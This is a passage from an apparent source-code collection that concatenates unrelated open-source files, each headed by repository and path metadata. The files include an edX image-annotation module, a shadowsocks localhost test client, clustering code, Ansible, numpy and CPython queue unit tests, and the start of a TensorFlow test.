display_name=_("Display Name"),
help=_("Display name for this module"),
scope=Scope.settings,
default=_('Image Annotation'),
)
instructor_tags = String(
display_name=_("Tags for Assignments"),
help=_("Add tags that automatically highlight in a certain color using the comma-separated form, i.e. imagery:red,parallelism:blue"),
scope=Scope.settings,
default='professor:green,teachingAssistant:blue',
)
annotation_storage_url = String(
help=_("Location of Annotation backend"),
scope=Scope.settings,
default="http://your_annotation_storage.com",
display_name=_("Url for Annotation Storage")
)
annotation_token_secret = String(
help=_("Secret string for annotation storage"),
scope=Scope.settings,
default="xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx",
display_name=_("Secret Token String for Annotation")
)
default_tab = String(
display_name=_("Default Annotations Tab"),
help=_("Select which tab will be the default in the annotations table: myNotes, Instructor, or Public."),
scope=Scope.settings,
default="myNotes",
)
# currently only supports one instructor, will build functionality for multiple later
instructor_email = String(
display_name=_("Email for 'Instructor' Annotations"),
help=_("Email of the user that will be attached to all annotations that will be found in 'Instructor' tab."),
scope=Scope.settings,
default="",
)
annotation_mode = String(
display_name=_("Mode for Annotation Tool"),
help=_("Type in number corresponding to following modes: 'instructor' or 'everyone'"),
scope=Scope.settings,
default="everyone",
)
class ImageAnnotationModule(AnnotatableFields, XModule):
'''Image Annotation Module'''
js = {
'coffee': [
resource_string(__name__, 'js/src/javascript_loader.coffee'),
resource_string(__name__, 'js/src/html/display.coffee'),
resource_string(__name__, 'js/src/annotatable/display.coffee'),
],
'js': [
resource_string(__name__, 'js/src/collapsible.js'),
]
}
css = {'scss': [resource_string(__name__, 'css/annotatable/display.scss')]}
icon_class = 'imageannotation'
def __init__(self, *args, **kwargs):
super(ImageAnnotationModule, self).__init__(*args, **kwargs)
xmltree = etree.fromstring(self.data)
self.instructions = self._extract_instructions(xmltree)
self.openseadragonjson = html_to_text(etree.tostring(xmltree.find('json'), encoding='unicode'))
self.user_email = ""
self.is_course_staff = False
if self.runtime.get_user_role() in ['instructor', 'staff']:
self.is_course_staff = True
if self.runtime.get_real_user is not None:
try:
self.user_email = self.runtime.get_real_user(self.runtime.anonymous_student_id).email
except Exception: # pylint: disable=broad-except
self.user_email = _("No email address found.")
def _extract_instructions(self, xmltree):
""" Removes <instructions> from the xmltree and returns them as a string, otherwise None. """
return get_instructions(xmltree)
def student_view(self, context):
""" Renders parameters to template. """
context = {
'display_name': self.display_name_with_default,
'instructions_html': self.instructions,
'token': retrieve_token(self.user_email, self.annotation_token_secret),
'tag': self.instructor_tags,
'openseadragonjson': self.openseadragonjson,
'annotation_storage': self.annotation_storage_url,
'default_tab': self.default_tab,
'instructor_email': self.instructor_email,
'annotation_mode': self.annotation_mode,
'is_course_staff': self.is_course_staff,
}
fragment = Fragment(self.system.render_template('imageannotation.html', context))
# TinyMCE already exists in Studio so we should not load the files again
# get_real_user always returns "None" in Studio since its runtimes contains no anonymous ids
if self.runtime.get_real_user is not None:
fragment.add_javascript_url(self.runtime.STATIC_URL + "js/vendor/tinymce/js/tinymce/tinymce.full.min.js")
fragment.add_javascript_url(self.runtime.STATIC_URL + "js/vendor/tinymce/js/tinymce/jquery.tinymce.min.js")
return fragment
class ImageAnnotationDescriptor(AnnotatableFields, RawDescriptor):
''' Image annotation descriptor '''
module_class = ImageAnnotationModule
mako_template = "widgets/raw-edit.html"
@property
def non_editable_metadata_fields(self):
non_editable_fields = super(ImageAnnotationDescriptor, self).non_editable_metadata_fields
non_editable_fields.extend([
ImageAnnotationDescriptor.annotation_storage_url,
ImageAnnotationDescriptor.annotation_token_secret,
])
return non_editable_fields
|
Parareru/shadowsocks
|
refs/heads/master
|
tests/graceful_cli.py
|
977
|
#!/usr/bin/python
import socks
import time
SERVER_IP = '127.0.0.1'
SERVER_PORT = 8001
if __name__ == '__main__':
s = socks.socksocket()
s.set_proxy(socks.SOCKS5, SERVER_IP, 1081)
s.connect((SERVER_IP, SERVER_PORT))
s.send(b'test')
time.sleep(30)
s.close()
|
fgiunta/data-science-from-scratch
|
refs/heads/master
|
code/clustering.py
|
60
|
from __future__ import division
from linear_algebra import squared_distance, vector_mean, distance
import math, random
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
class KMeans:
"""performs k-means clustering"""
def __init__(self, k):
self.k = k # number of clusters
self.means = None # means of clusters
def classify(self, input):
"""return the index of the cluster closest to the input"""
return min(range(self.k),
key=lambda i: squared_distance(input, self.means[i]))
def train(self, inputs):
self.means = random.sample(inputs, self.k)
assignments = None
while True:
# Find new assignments
new_assignments = map(self.classify, inputs)
# If no assignments have changed, we're done.
if assignments == new_assignments:
return
# Otherwise keep the new assignments,
assignments = new_assignments
for i in range(self.k):
i_points = [p for p, a in zip(inputs, assignments) if a == i]
# avoid divide-by-zero if i_points is empty
if i_points:
self.means[i] = vector_mean(i_points)
def squared_clustering_errors(inputs, k):
"""finds the total squared error from k-means clustering the inputs"""
clusterer = KMeans(k)
clusterer.train(inputs)
means = clusterer.means
assignments = map(clusterer.classify, inputs)
return sum(squared_distance(input,means[cluster])
for input, cluster in zip(inputs, assignments))
def plot_squared_clustering_errors(plt):
ks = range(1, len(inputs) + 1)
errors = [squared_clustering_errors(inputs, k) for k in ks]
plt.plot(ks, errors)
plt.xticks(ks)
plt.xlabel("k")
plt.ylabel("total squared error")
plt.show()
#
# using clustering to recolor an image
#
def recolor_image(input_file, k=5):
img = mpimg.imread(path_to_png_file)
pixels = [pixel for row in img for pixel in row]
clusterer = KMeans(k)
clusterer.train(pixels) # this might take a while
def recolor(pixel):
cluster = clusterer.classify(pixel) # index of the closest cluster
return clusterer.means[cluster] # mean of the closest cluster
new_img = [[recolor(pixel) for pixel in row]
for row in img]
plt.imshow(new_img)
plt.axis('off')
plt.show()
#
# hierarchical clustering
#
def is_leaf(cluster):
"""a cluster is a leaf if it has length 1"""
return len(cluster) == 1
def get_children(cluster):
"""returns the two children of this cluster if it's a merged cluster;
raises an exception if this is a leaf cluster"""
if is_leaf(cluster):
raise TypeError("a leaf cluster has no children")
else:
return cluster[1]
def get_values(cluster):
"""returns the value in this cluster (if it's a leaf cluster)
or all the values in the leaf clusters below it (if it's not)"""
if is_leaf(cluster):
return cluster # is already a 1-tuple containing value
else:
return [value
for child in get_children(cluster)
for value in get_values(child)]
def cluster_distance(cluster1, cluster2, distance_agg=min):
"""finds the aggregate distance between elements of cluster1
and elements of cluster2"""
return distance_agg([distance(input1, input2)
for input1 in get_values(cluster1)
for input2 in get_values(cluster2)])
def get_merge_order(cluster):
if is_leaf(cluster):
return float('inf')
else:
return cluster[0] # merge_order is first element of 2-tuple
def bottom_up_cluster(inputs, distance_agg=min):
# start with every input a leaf cluster / 1-tuple
clusters = [(input,) for input in inputs]
# as long as we have more than one cluster left...
while len(clusters) > 1:
# find the two closest clusters
c1, c2 = min([(cluster1, cluster2)
for i, cluster1 in enumerate(clusters)
for cluster2 in clusters[:i]],
key=lambda (x, y): cluster_distance(x, y, distance_agg))
# remove them from the list of clusters
clusters = [c for c in clusters if c != c1 and c != c2]
# merge them, using merge_order = # of clusters left
merged_cluster = (len(clusters), [c1, c2])
# and add their merge
clusters.append(merged_cluster)
# when there's only one cluster left, return it
return clusters[0]
def generate_clusters(base_cluster, num_clusters):
# start with a list with just the base cluster
clusters = [base_cluster]
# as long as we don't have enough clusters yet...
while len(clusters) < num_clusters:
# choose the last-merged of our clusters
next_cluster = min(clusters, key=get_merge_order)
# remove it from the list
clusters = [c for c in clusters if c != next_cluster]
# and add its children to the list (i.e., unmerge it)
clusters.extend(get_children(next_cluster))
# once we have enough clusters...
return clusters
if __name__ == "__main__":
inputs = [[-14,-5],[13,13],[20,23],[-19,-11],[-9,-16],[21,27],[-49,15],[26,13],[-46,5],[-34,-1],[11,15],[-49,0],[-22,-16],[19,28],[-12,-8],[-13,-19],[-41,8],[-11,-6],[-25,-9],[-18,-3]]
random.seed(0) # so you get the same results as me
clusterer = KMeans(3)
clusterer.train(inputs)
print "3-means:"
print clusterer.means
print
random.seed(0)
clusterer = KMeans(2)
clusterer.train(inputs)
print "2-means:"
print clusterer.means
print
print "errors as a function of k"
for k in range(1, len(inputs) + 1):
print k, squared_clustering_errors(inputs, k)
print
print "bottom up hierarchical clustering"
base_cluster = bottom_up_cluster(inputs)
print base_cluster
print
print "three clusters, min:"
for cluster in generate_clusters(base_cluster, 3):
print get_values(cluster)
print
print "three clusters, max:"
base_cluster = bottom_up_cluster(inputs, max)
for cluster in generate_clusters(base_cluster, 3):
print get_values(cluster)
|
potzenheimer/xdash
|
refs/heads/master
|
src/xpose.sitetheme/xpose/sitetheme/__init__.py
|
26
|
# -*- extra stuff goes here -*-
def initialize(context):
"""Initializer called when used as a Zope 2 product."""
|
hyperized/ansible
|
refs/heads/devel
|
test/units/modules/network/nxos/test_nxos_command.py
|
51
|
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
from units.compat.mock import patch
from ansible.modules.network.nxos import nxos_command
from .nxos_module import TestNxosModule, load_fixture, set_module_args
class TestNxosCommandModule(TestNxosModule):
module = nxos_command
def setUp(self):
super(TestNxosCommandModule, self).setUp()
self.mock_run_commands = patch('ansible.modules.network.nxos.nxos_command.run_commands')
self.run_commands = self.mock_run_commands.start()
def tearDown(self):
super(TestNxosCommandModule, self).tearDown()
self.mock_run_commands.stop()
def load_fixtures(self, commands=None, device=''):
def load_from_file(*args, **kwargs):
module, commands = args
output = list()
for item in commands:
try:
obj = json.loads(item['command'])
command = obj['command']
except ValueError:
command = item['command']
filename = '%s.txt' % str(command).replace(' ', '_')
output.append(load_fixture('nxos_command', filename))
return output
self.run_commands.side_effect = load_from_file
def test_nxos_command_simple(self):
set_module_args(dict(commands=['show version']))
result = self.execute_module()
self.assertEqual(len(result['stdout']), 1)
self.assertTrue(result['stdout'][0].startswith('Cisco'))
def test_nxos_command_multiple(self):
set_module_args(dict(commands=['show version', 'show version']))
result = self.execute_module()
self.assertEqual(len(result['stdout']), 2)
self.assertTrue(result['stdout'][0].startswith('Cisco'))
def test_nxos_command_wait_for(self):
wait_for = 'result[0] contains "NX-OS"'
set_module_args(dict(commands=['show version'], wait_for=wait_for))
self.execute_module()
def test_nxos_command_wait_for_fails(self):
wait_for = 'result[0] contains "test string"'
set_module_args(dict(commands=['show version'], wait_for=wait_for))
self.execute_module(failed=True)
self.assertEqual(self.run_commands.call_count, 10)
def test_nxos_command_retries(self):
wait_for = 'result[0] contains "test string"'
set_module_args(dict(commands=['show version'], wait_for=wait_for, retries=2))
self.execute_module(failed=True)
self.assertEqual(self.run_commands.call_count, 2)
def test_nxos_command_match_any(self):
wait_for = ['result[0] contains "Cisco"',
'result[0] contains "test string"']
set_module_args(dict(commands=['show version'], wait_for=wait_for, match='any'))
self.execute_module()
def test_nxos_command_match_all(self):
wait_for = ['result[0] contains "Cisco"',
'result[0] contains "image file"']
set_module_args(dict(commands=['show version'], wait_for=wait_for, match='all'))
self.execute_module()
def test_nxos_command_match_all_failure(self):
wait_for = ['result[0] contains "Cisco"',
'result[0] contains "test string"']
commands = ['show version', 'show version']
set_module_args(dict(commands=commands, wait_for=wait_for, match='all'))
self.execute_module(failed=True)
|
cmdunkers/DeeperMind
|
refs/heads/master
|
PythonEnv/lib/python2.7/site-packages/numpy/distutils/tests/test_exec_command.py
|
201
|
from __future__ import division, absolute_import, print_function
import os
import sys
from tempfile import TemporaryFile
from numpy.distutils import exec_command
# In python 3 stdout, stderr are text (unicode compliant) devices, so to
# emulate them import StringIO from the io module.
if sys.version_info[0] >= 3:
from io import StringIO
else:
from StringIO import StringIO
class redirect_stdout(object):
"""Context manager to redirect stdout for exec_command test."""
def __init__(self, stdout=None):
self._stdout = stdout or sys.stdout
def __enter__(self):
self.old_stdout = sys.stdout
sys.stdout = self._stdout
def __exit__(self, exc_type, exc_value, traceback):
self._stdout.flush()
sys.stdout = self.old_stdout
# note: closing sys.stdout won't close it.
self._stdout.close()
class redirect_stderr(object):
"""Context manager to redirect stderr for exec_command test."""
def __init__(self, stderr=None):
self._stderr = stderr or sys.stderr
def __enter__(self):
self.old_stderr = sys.stderr
sys.stderr = self._stderr
def __exit__(self, exc_type, exc_value, traceback):
self._stderr.flush()
sys.stderr = self.old_stderr
# note: closing sys.stderr won't close it.
self._stderr.close()
class emulate_nonposix(object):
"""Context manager to emulate os.name != 'posix' """
def __init__(self, osname='non-posix'):
self._new_name = osname
def __enter__(self):
self._old_name = os.name
os.name = self._new_name
def __exit__(self, exc_type, exc_value, traceback):
os.name = self._old_name
def test_exec_command_stdout():
# Regression test for gh-2999 and gh-2915.
# There are several packages (nose, scipy.weave.inline, Sage inline
# Fortran) that replace stdout, in which case it doesn't have a fileno
# method. This is tested here, with a do-nothing command that fails if the
# presence of fileno() is assumed in exec_command.
# The code has a special case for posix systems, so if we are on posix test
# both that the special case works and that the generic code works.
# Test posix version:
with redirect_stdout(StringIO()):
with redirect_stderr(TemporaryFile()):
exec_command.exec_command("cd '.'")
if os.name == 'posix':
# Test general (non-posix) version:
with emulate_nonposix():
with redirect_stdout(StringIO()):
with redirect_stderr(TemporaryFile()):
exec_command.exec_command("cd '.'")
def test_exec_command_stderr():
# Test posix version:
with redirect_stdout(TemporaryFile(mode='w+')):
with redirect_stderr(StringIO()):
exec_command.exec_command("cd '.'")
if os.name == 'posix':
# Test general (non-posix) version:
with emulate_nonposix():
with redirect_stdout(TemporaryFile()):
with redirect_stderr(StringIO()):
exec_command.exec_command("cd '.'")
|
zxsted/scipy
|
refs/heads/master
|
scipy/weave/weave_version.py
|
100
|
from __future__ import absolute_import, print_function
major = 0
minor = 4
micro = 9
#release_level = 'alpha'
release_level = ''
if release_level:
weave_version = '%(major)d.%(minor)d.%(micro)d_%(release_level)s'\
% (locals())
else:
weave_version = '%(major)d.%(minor)d.%(micro)d'\
% (locals())
|
kikocorreoso/brython
|
refs/heads/master
|
www/src/Lib/test/test_queue.py
|
2
|
# Some simple queue module tests, plus some failure conditions
# to ensure the Queue locks remain stable.
import itertools
import random
import threading
import time
import unittest
import weakref
from test import support
py_queue = support.import_fresh_module('queue', blocked=['_queue'])
c_queue = support.import_fresh_module('queue', fresh=['_queue'])
need_c_queue = unittest.skipUnless(c_queue, "No _queue module found")
QUEUE_SIZE = 5
def qfull(q):
return q.maxsize > 0 and q.qsize() == q.maxsize
# A thread to run a function that unclogs a blocked Queue.
class _TriggerThread(threading.Thread):
def __init__(self, fn, args):
self.fn = fn
self.args = args
self.startedEvent = threading.Event()
threading.Thread.__init__(self)
def run(self):
# The sleep isn't necessary, but is intended to give the blocking
# function in the main thread a chance at actually blocking before
# we unclog it. But if the sleep is longer than the timeout-based
# tests wait in their blocking functions, those tests will fail.
# So we give them much longer timeout values compared to the
# sleep here (I aimed at 10 seconds for blocking functions --
# they should never actually wait that long - they should make
# progress as soon as we call self.fn()).
time.sleep(0.1)
self.startedEvent.set()
self.fn(*self.args)
# Execute a function that blocks, and in a separate thread, a function that
# triggers the release. Returns the result of the blocking function. Caution:
# block_func must guarantee to block until trigger_func is called, and
# trigger_func must guarantee to change queue state so that block_func can make
# enough progress to return. In particular, a block_func that just raises an
# exception regardless of whether trigger_func is called will lead to
# timing-dependent sporadic failures, and one of those went rarely seen but
# undiagnosed for years. Now block_func must be unexceptional. If block_func
# is supposed to raise an exception, call do_exceptional_blocking_test()
# instead.
class BlockingTestMixin:
def do_blocking_test(self, block_func, block_args, trigger_func, trigger_args):
thread = _TriggerThread(trigger_func, trigger_args)
thread.start()
try:
self.result = block_func(*block_args)
# If block_func returned before our thread made the call, we failed!
if not thread.startedEvent.is_set():
self.fail("blocking function %r appeared not to block" %
block_func)
return self.result
finally:
support.join_thread(thread, 10) # make sure the thread terminates
# Call this instead if block_func is supposed to raise an exception.
def do_exceptional_blocking_test(self,block_func, block_args, trigger_func,
trigger_args, expected_exception_class):
thread = _TriggerThread(trigger_func, trigger_args)
thread.start()
try:
try:
block_func(*block_args)
except expected_exception_class:
raise
else:
self.fail("expected exception of kind %r" %
expected_exception_class)
finally:
support.join_thread(thread, 10) # make sure the thread terminates
if not thread.startedEvent.is_set():
self.fail("trigger thread ended but event never set")
class BaseQueueTestMixin(BlockingTestMixin):
def setUp(self):
self.cum = 0
self.cumlock = threading.Lock()
def basic_queue_test(self, q):
if q.qsize():
raise RuntimeError("Call this function with an empty queue")
self.assertTrue(q.empty())
self.assertFalse(q.full())
# I guess we better check things actually queue correctly a little :)
q.put(111)
q.put(333)
q.put(222)
target_order = dict(Queue = [111, 333, 222],
LifoQueue = [222, 333, 111],
PriorityQueue = [111, 222, 333])
actual_order = [q.get(), q.get(), q.get()]
self.assertEqual(actual_order, target_order[q.__class__.__name__],
"Didn't seem to queue the correct data!")
for i in range(QUEUE_SIZE-1):
q.put(i)
self.assertTrue(q.qsize(), "Queue should not be empty")
self.assertTrue(not qfull(q), "Queue should not be full")
last = 2 * QUEUE_SIZE
full = 3 * 2 * QUEUE_SIZE
q.put(last)
self.assertTrue(qfull(q), "Queue should be full")
self.assertFalse(q.empty())
self.assertTrue(q.full())
try:
q.put(full, block=0)
self.fail("Didn't appear to block with a full queue")
except self.queue.Full:
pass
try:
q.put(full, timeout=0.01)
self.fail("Didn't appear to time-out with a full queue")
except self.queue.Full:
pass
# Test a blocking put
self.do_blocking_test(q.put, (full,), q.get, ())
self.do_blocking_test(q.put, (full, True, 10), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
try:
q.get(block=0)
self.fail("Didn't appear to block with an empty queue")
except self.queue.Empty:
pass
try:
q.get(timeout=0.01)
self.fail("Didn't appear to time-out with an empty queue")
except self.queue.Empty:
pass
# Test a blocking get
self.do_blocking_test(q.get, (), q.put, ('empty',))
self.do_blocking_test(q.get, (True, 10), q.put, ('empty',))
def worker(self, q):
while True:
x = q.get()
if x < 0:
q.task_done()
return
with self.cumlock:
self.cum += x
q.task_done()
def queue_join_test(self, q):
self.cum = 0
threads = []
for i in (0,1):
thread = threading.Thread(target=self.worker, args=(q,))
thread.start()
threads.append(thread)
for i in range(100):
q.put(i)
q.join()
self.assertEqual(self.cum, sum(range(100)),
"q.join() did not block until all tasks were done")
for i in (0,1):
q.put(-1) # instruct the threads to close
q.join() # verify that you can join twice
for thread in threads:
thread.join()
def test_queue_task_done(self):
# Test to make sure a queue task completed successfully.
q = self.type2test()
try:
q.task_done()
except ValueError:
pass
else:
self.fail("Did not detect task count going negative")
def test_queue_join(self):
# Test that a queue join()s successfully, and before anything else
# (done twice for insurance).
q = self.type2test()
self.queue_join_test(q)
self.queue_join_test(q)
try:
q.task_done()
except ValueError:
pass
else:
self.fail("Did not detect task count going negative")
def test_basic(self):
# Do it a couple of times on the same queue.
# Done twice to make sure works with same instance reused.
q = self.type2test(QUEUE_SIZE)
self.basic_queue_test(q)
self.basic_queue_test(q)
def test_negative_timeout_raises_exception(self):
q = self.type2test(QUEUE_SIZE)
with self.assertRaises(ValueError):
q.put(1, timeout=-1)
with self.assertRaises(ValueError):
q.get(1, timeout=-1)
def test_nowait(self):
q = self.type2test(QUEUE_SIZE)
for i in range(QUEUE_SIZE):
q.put_nowait(1)
with self.assertRaises(self.queue.Full):
q.put_nowait(1)
for i in range(QUEUE_SIZE):
q.get_nowait()
with self.assertRaises(self.queue.Empty):
q.get_nowait()
def test_shrinking_queue(self):
# issue 10110
q = self.type2test(3)
q.put(1)
q.put(2)
q.put(3)
with self.assertRaises(self.queue.Full):
q.put_nowait(4)
self.assertEqual(q.qsize(), 3)
q.maxsize = 2 # shrink the queue
with self.assertRaises(self.queue.Full):
q.put_nowait(4)
class QueueTest(BaseQueueTestMixin):
def setUp(self):
self.type2test = self.queue.Queue
super().setUp()
class PyQueueTest(QueueTest, unittest.TestCase):
queue = py_queue
@need_c_queue
class CQueueTest(QueueTest, unittest.TestCase):
queue = c_queue
class LifoQueueTest(BaseQueueTestMixin):
def setUp(self):
self.type2test = self.queue.LifoQueue
super().setUp()
class PyLifoQueueTest(LifoQueueTest, unittest.TestCase):
queue = py_queue
@need_c_queue
class CLifoQueueTest(LifoQueueTest, unittest.TestCase):
queue = c_queue
class PriorityQueueTest(BaseQueueTestMixin):
def setUp(self):
self.type2test = self.queue.PriorityQueue
super().setUp()
class PyPriorityQueueTest(PriorityQueueTest, unittest.TestCase):
queue = py_queue
@need_c_queue
class CPriorityQueueTest(PriorityQueueTest, unittest.TestCase):
queue = c_queue
# A Queue subclass that can provoke failure at a moment's notice :)
class FailingQueueException(Exception): pass
class FailingQueueTest(BlockingTestMixin):
def setUp(self):
Queue = self.queue.Queue
class FailingQueue(Queue):
def __init__(self, *args):
self.fail_next_put = False
self.fail_next_get = False
Queue.__init__(self, *args)
def _put(self, item):
if self.fail_next_put:
self.fail_next_put = False
raise FailingQueueException("You Lose")
return Queue._put(self, item)
def _get(self):
if self.fail_next_get:
self.fail_next_get = False
raise FailingQueueException("You Lose")
return Queue._get(self)
self.FailingQueue = FailingQueue
super().setUp()
def failing_queue_test(self, q):
if q.qsize():
raise RuntimeError("Call this function with an empty queue")
for i in range(QUEUE_SIZE-1):
q.put(i)
# Test a failing non-blocking put.
q.fail_next_put = True
try:
q.put("oops", block=0)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.fail_next_put = True
try:
q.put("oops", timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.put("last")
self.assertTrue(qfull(q), "Queue should be full")
# Test a failing blocking put
q.fail_next_put = True
try:
self.do_blocking_test(q.put, ("full",), q.get, ())
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
# Test a failing timeout put
q.fail_next_put = True
try:
self.do_exceptional_blocking_test(q.put, ("full", True, 10), q.get, (),
FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
self.assertTrue(qfull(q), "Queue should be full")
q.get()
self.assertTrue(not qfull(q), "Queue should not be full")
q.put("last")
self.assertTrue(qfull(q), "Queue should be full")
# Test a blocking put
self.do_blocking_test(q.put, ("full",), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
q.put("first")
q.fail_next_get = True
try:
q.get()
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(q.qsize(), "Queue should not be empty")
q.fail_next_get = True
try:
q.get(timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(q.qsize(), "Queue should not be empty")
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
q.fail_next_get = True
try:
self.do_exceptional_blocking_test(q.get, (), q.put, ('empty',),
FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# put succeeded, but get failed.
self.assertTrue(q.qsize(), "Queue should not be empty")
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
def test_failing_queue(self):
# Test to make sure a queue is functioning correctly.
# Done twice to the same instance.
q = self.FailingQueue(QUEUE_SIZE)
self.failing_queue_test(q)
self.failing_queue_test(q)
class PyFailingQueueTest(FailingQueueTest, unittest.TestCase):
queue = py_queue
@need_c_queue
class CFailingQueueTest(FailingQueueTest, unittest.TestCase):
queue = c_queue
class BaseSimpleQueueTest:
def setUp(self):
self.q = self.type2test()
def feed(self, q, seq, rnd):
while True:
try:
val = seq.pop()
except IndexError:
return
q.put(val)
if rnd.random() > 0.5:
time.sleep(rnd.random() * 1e-3)
def consume(self, q, results, sentinel):
while True:
val = q.get()
if val == sentinel:
return
results.append(val)
def consume_nonblock(self, q, results, sentinel):
while True:
while True:
try:
val = q.get(block=False)
except self.queue.Empty:
time.sleep(1e-5)
else:
break
if val == sentinel:
return
results.append(val)
def consume_timeout(self, q, results, sentinel):
while True:
while True:
try:
val = q.get(timeout=1e-5)
except self.queue.Empty:
pass
else:
break
if val == sentinel:
return
results.append(val)
def run_threads(self, n_feeders, n_consumers, q, inputs,
feed_func, consume_func):
results = []
sentinel = None
seq = inputs + [sentinel] * n_consumers
seq.reverse()
rnd = random.Random(42)
exceptions = []
def log_exceptions(f):
def wrapper(*args, **kwargs):
try:
f(*args, **kwargs)
except BaseException as e:
exceptions.append(e)
return wrapper
feeders = [threading.Thread(target=log_exceptions(feed_func),
args=(q, seq, rnd))
for i in range(n_feeders)]
consumers = [threading.Thread(target=log_exceptions(consume_func),
args=(q, results, sentinel))
for i in range(n_consumers)]
with support.start_threads(feeders + consumers):
pass
self.assertFalse(exceptions)
self.assertTrue(q.empty())
self.assertEqual(q.qsize(), 0)
return results
def test_basic(self):
# Basic tests for get(), put() etc.
q = self.q
self.assertTrue(q.empty())
self.assertEqual(q.qsize(), 0)
q.put(1)
self.assertFalse(q.empty())
self.assertEqual(q.qsize(), 1)
q.put(2)
q.put_nowait(3)
q.put(4)
self.assertFalse(q.empty())
self.assertEqual(q.qsize(), 4)
self.assertEqual(q.get(), 1)
self.assertEqual(q.qsize(), 3)
self.assertEqual(q.get_nowait(), 2)
self.assertEqual(q.qsize(), 2)
self.assertEqual(q.get(block=False), 3)
self.assertFalse(q.empty())
self.assertEqual(q.qsize(), 1)
self.assertEqual(q.get(timeout=0.1), 4)
self.assertTrue(q.empty())
self.assertEqual(q.qsize(), 0)
with self.assertRaises(self.queue.Empty):
q.get(block=False)
with self.assertRaises(self.queue.Empty):
q.get(timeout=1e-3)
with self.assertRaises(self.queue.Empty):
q.get_nowait()
self.assertTrue(q.empty())
self.assertEqual(q.qsize(), 0)
def test_negative_timeout_raises_exception(self):
q = self.q
q.put(1)
with self.assertRaises(ValueError):
q.get(timeout=-1)
def test_order(self):
# Test a pair of concurrent put() and get()
q = self.q
inputs = list(range(100))
results = self.run_threads(1, 1, q, inputs, self.feed, self.consume)
# One producer, one consumer => results appended in well-defined order
self.assertEqual(results, inputs)
def test_many_threads(self):
# Test multiple concurrent put() and get()
N = 50
q = self.q
inputs = list(range(10000))
results = self.run_threads(N, N, q, inputs, self.feed, self.consume)
# Multiple consumers without synchronization append the
# results in random order
self.assertEqual(sorted(results), inputs)
def test_many_threads_nonblock(self):
# Test multiple concurrent put() and get(block=False)
N = 50
q = self.q
inputs = list(range(10000))
results = self.run_threads(N, N, q, inputs,
self.feed, self.consume_nonblock)
self.assertEqual(sorted(results), inputs)
def test_many_threads_timeout(self):
# Test multiple concurrent put() and get(timeout=...)
N = 50
q = self.q
inputs = list(range(1000))
results = self.run_threads(N, N, q, inputs,
self.feed, self.consume_timeout)
self.assertEqual(sorted(results), inputs)
def test_references(self):
# The queue should lose references to each item as soon as
# it leaves the queue.
class C:
pass
N = 20
q = self.q
for i in range(N):
q.put(C())
for i in range(N):
wr = weakref.ref(q.get())
self.assertIsNone(wr())
class PySimpleQueueTest(BaseSimpleQueueTest, unittest.TestCase):
queue = py_queue
def setUp(self):
self.type2test = self.queue._PySimpleQueue
super().setUp()
@need_c_queue
class CSimpleQueueTest(BaseSimpleQueueTest, unittest.TestCase):
queue = c_queue
def setUp(self):
self.type2test = self.queue.SimpleQueue
super().setUp()
def test_is_default(self):
self.assertIs(self.type2test, self.queue.SimpleQueue)
self.assertIs(self.type2test, self.queue.SimpleQueue)
def test_reentrancy(self):
# bpo-14976: put() may be called reentrantly in an asynchronous
# callback.
q = self.q
gen = itertools.count()
N = 10000
results = []
# This test exploits the fact that __del__ in a reference cycle
# can be called any time the GC may run.
class Circular(object):
def __init__(self):
self.circular = self
def __del__(self):
q.put(next(gen))
while True:
o = Circular()
q.put(next(gen))
del o
results.append(q.get())
if results[-1] >= N:
break
self.assertEqual(results, list(range(N + 1)))
if __name__ == "__main__":
unittest.main()
|
natanielruiz/android-yolo
|
refs/heads/master
|
jni-build/jni/include/tensorflow/python/summary/impl/directory_watcher_test.py
|
4
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for directory_watcher."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import shutil
from tensorflow.python.framework import test_util
from tensorflow.python.platform import googletest
from tensorflow.python.summary.impl import directory_watcher
class _ByteLoader(object):
"""A loader that loads individual bytes from a file."""
def __init__(self, path):
self._f = open(path)
self.bytes_read = 0
def Load(self):
while True:
self._f.seek(self.bytes_read)
byte = self._f.read(1)
if byte:
self.bytes_read += 1
yield byte
else:
return
class DirectoryWatcherTest(test_util.TensorFlowTestCase):
def setUp(self):
# Put everything in a directory so it's easier to delete.
self._directory = os.path.join(self.get_temp_dir(), 'monitor_dir')
os.mkdir(self._directory)
self._watcher = directory_watcher.DirectoryWatcher(self._directory,
_ByteLoader)
def tearDown(self):
shutil.rmtree(self._directory)
def _WriteToFile(self, filename, data):
path = os.path.join(self._directory, filename)
